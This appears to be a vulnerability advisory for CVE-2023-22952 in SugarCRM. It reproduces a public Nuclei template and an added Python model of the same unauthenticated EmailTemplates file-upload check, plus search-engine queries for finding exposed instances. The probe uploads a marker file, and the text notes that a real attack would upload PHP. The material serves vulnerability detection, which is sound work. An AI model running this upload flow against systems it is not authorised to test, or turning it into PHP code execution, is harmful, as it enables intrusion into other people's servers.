CVE-2023-22952: SugarCRM Unauthenticated - Remote Code Execution

Date: 2025-08-01 | Affected software: SugarCRM | PoC: public

Vulnerability description

In SugarCRM before 12.0 Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates module because of missing input validation. As the template below shows, a failed Users/Authenticate request is enough for a subsequent EmailTemplates AttachFiles upload to be accepted, so no valid credentials are needed; the upload handler accepts an image body but keeps the attacker-chosen filename and extension, and the file is written under cache/images/ where it can be fetched back (a .txt marker file in the template, PHP in a real attack). The CVSS vector (PR:L) reflects the original NVD scoring, not this unauthenticated path.

PoC code [public]

id: CVE-2023-22952

info:
  name: SugarCRM Unauthenticated - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
  reference:
    - https://attackerkb.com/topics/E486ui94II/cve-2023-22952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-22952
    cwe-id: CWE-20,CWE-94
    epss-score: 0.93756
    epss-percentile: 0.99852
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"sugarcrm inc. all rights reserved"
      - http.title:"sugar setup wizard"
      - http.title:"sugarcrm"
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title="sugar setup wizard"
      - title=sugarcrm
    google-query:
      - intext:"sugarcrm inc. all rights reserved"
      - intitle:"sugar setup wizard"
      - intitle:sugarcrm
  tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'You must specify a valid username and password'

  - raw:
      - |-
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR
        Connection: close

        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="action"

        AttachFiles
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="module"

        EmailTemplates
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: image/png

        {{ base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAUAAAAUBAMAAAC3y+roAAAAD1BMVEVDVkUtMjAyMy0yMjk1MiA7qbPWAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAEUlEQVQImWNgAAJGZQcGKgEAHPkAZVUOitsAAAAASUVORK5CYII=')}}
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR--


    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '["cache\/images\/{{randstr}}.txt"]'

  - raw:
      - |
        GET /cache/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2023-22952"

      - type: word
        part: header
        words:
          - "text/plain"
# digest: 490a0046304402202bc6e9d8d6e40781aec2d2db94905cfc0f2f0743f760c2d1235696cfe1e6e47b022058e8d6aded55b63eac57c7edd57d3bbb6a51ce10690770191fde278060be8a19:922c64590222798bb761d5b6d8e72950
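The template runs three requests: a failed login, a multipart AttachFiles upload, and a GET of the stored file. The Python below is an added example, not code from this page, the Nuclei project or SugarCRM: it models that same flow offline by building a genuinely valid PNG whose palette bytes are the marker string (the same trick the template's base64 blob uses), assembling the multipart body, parsing the JSON cache path the upload returns, and fetching the file back. The `FakeSugar` class and the `probe.txt` filename are constructed stand-ins so the checker can be exercised without a target; `check_target` itself only needs a `send` callable, so a real HTTP client can be dropped in. Note that even the .txt probe writes a file to the target, which is why the template carries the `intrusive` tag.

```python
"""Offline model of the three requests in the Nuclei template above (added example)."""
import json
import re
import struct
import zlib
from typing import Callable, Dict, Optional, Tuple

MARKER = b"CVE-2023-22952 "                               # 15 bytes = five RGB palette entries
BOUNDARY = "----WebKitFormBoundaryWeTJtA8WByYIQMGR"       # boundary reused from the template
Response = Tuple[int, Dict[str, str], bytes]              # (status, headers, body)
Transport = Callable[[str, str, Dict[str, str], bytes], Response]


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """length || type || data || CRC32(type || data), per the PNG spec."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_marker_png(marker: bytes = MARKER) -> bytes:
    """1x1 indexed-colour PNG whose palette bytes are the marker: a real image to
    any image sniffer, yet the marker stays verbatim in the stored file."""
    if len(marker) % 3:
        raise ValueError("PLTE length must be a multiple of 3")
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 3, 0, 0, 0)  # 1x1, 8-bit, colour type 3
    idat = zlib.compress(b"\x00\x00")                    # filter 0 + palette index 0
    return (b"\x89PNG\r\n\x1a\n" + png_chunk(b"IHDR", ihdr) + png_chunk(b"PLTE", marker)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def build_upload_body(filename: str, file_bytes: bytes, boundary: str = BOUNDARY) -> bytes:
    """multipart/form-data body with the template's three parts (action, module, file)."""
    out = b""
    for name, value in (("action", "AttachFiles"), ("module", "EmailTemplates")):
        out += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
    out += (f'--{boundary}\r\nContent-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            "Content-Type: image/png\r\n\r\n").encode()
    return out + file_bytes + f"\r\n--{boundary}--\r\n".encode()


def parse_upload_path(body: str) -> Optional[str]:
    """AttachFiles answers with a JSON array such as ["cache\\/images\\/x.txt"]."""
    m = re.search(r'\[\s*"cache\\?/images\\?/[^"\]]+"\s*\]', body)
    return json.loads(m.group(0))[0] if m else None


def check_target(send: Transport, filename: str) -> dict:
    """The template's flow: failed login, upload, fetch-back; all three must match."""
    # 1. A failed Authenticate still leaves session state the EmailTemplates
    #    module accepts, which is why the upload needs no valid credentials.
    _, _, body = send("POST", "/index.php", {"Content-Type": "application/x-www-form-urlencoded"},
                      b"module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a")
    if b"You must specify a valid username and password" not in body:
        return {"vulnerable": False, "stage": "authenticate", "path": None}
    # 2. Upload a valid PNG under an attacker-chosen filename and extension.
    _, _, body = send("POST", "/index.php", {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"},
                      build_upload_body(filename, build_marker_png()))
    path = parse_upload_path(body.decode(errors="replace"))
    if path != f"cache/images/{filename}":
        return {"vulnerable": False, "stage": "upload", "path": path}
    # 3. Fetch the file back: marker present and served as text/plain, as in the template.
    status, headers, body = send("GET", "/" + path, {}, b"")
    ok = status == 200 and MARKER.strip() in body and "text/plain" in headers.get("Content-Type", "")
    return {"vulnerable": ok, "stage": "verify", "path": path}


class FakeSugar:
    """Constructed stand-in for a vulnerable (or patched) instance, not real
    SugarCRM code, so the check can be exercised offline."""
    def __init__(self, patched: bool = False):
        self.patched, self.files = patched, {}

    def send(self, method: str, path: str, headers: Dict[str, str], body: bytes) -> Response:
        if method == "POST" and b"action=Authenticate" in body:
            return 200, {}, b"<p>You must specify a valid username and password.</p>"
        if method == "POST" and b"AttachFiles" in body and not self.patched:
            name = body.split(b'filename="', 1)[1].split(b'"', 1)[0].decode()
            data = body.split(b"Content-Type: image/png\r\n\r\n", 1)[1].rsplit(b"\r\n--", 1)[0]
            self.files["/cache/images/" + name] = data
            return 200, {}, json.dumps([f"cache/images/{name}"]).encode().replace(b"/", b"\\/")
        if method == "GET" and path in self.files:
            return 200, {"Content-Type": "text/plain"}, self.files[path]
        return 403 if method == "POST" else 404, {}, b""


if __name__ == "__main__":
    print(check_target(FakeSugar().send, "probe.txt"))
    print(check_target(FakeSugar(patched=True).send, "probe.txt"))
```

The three-stage result tells you where a target stops matching, which is more useful than a bare true/false when a WAF or a partial fix interferes: `stage: "authenticate"` means the login page text differs, `stage: "upload"` means the AttachFiles action rejected the file or returned a different path, and only a full `verify` pass reproduces what the template reports.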
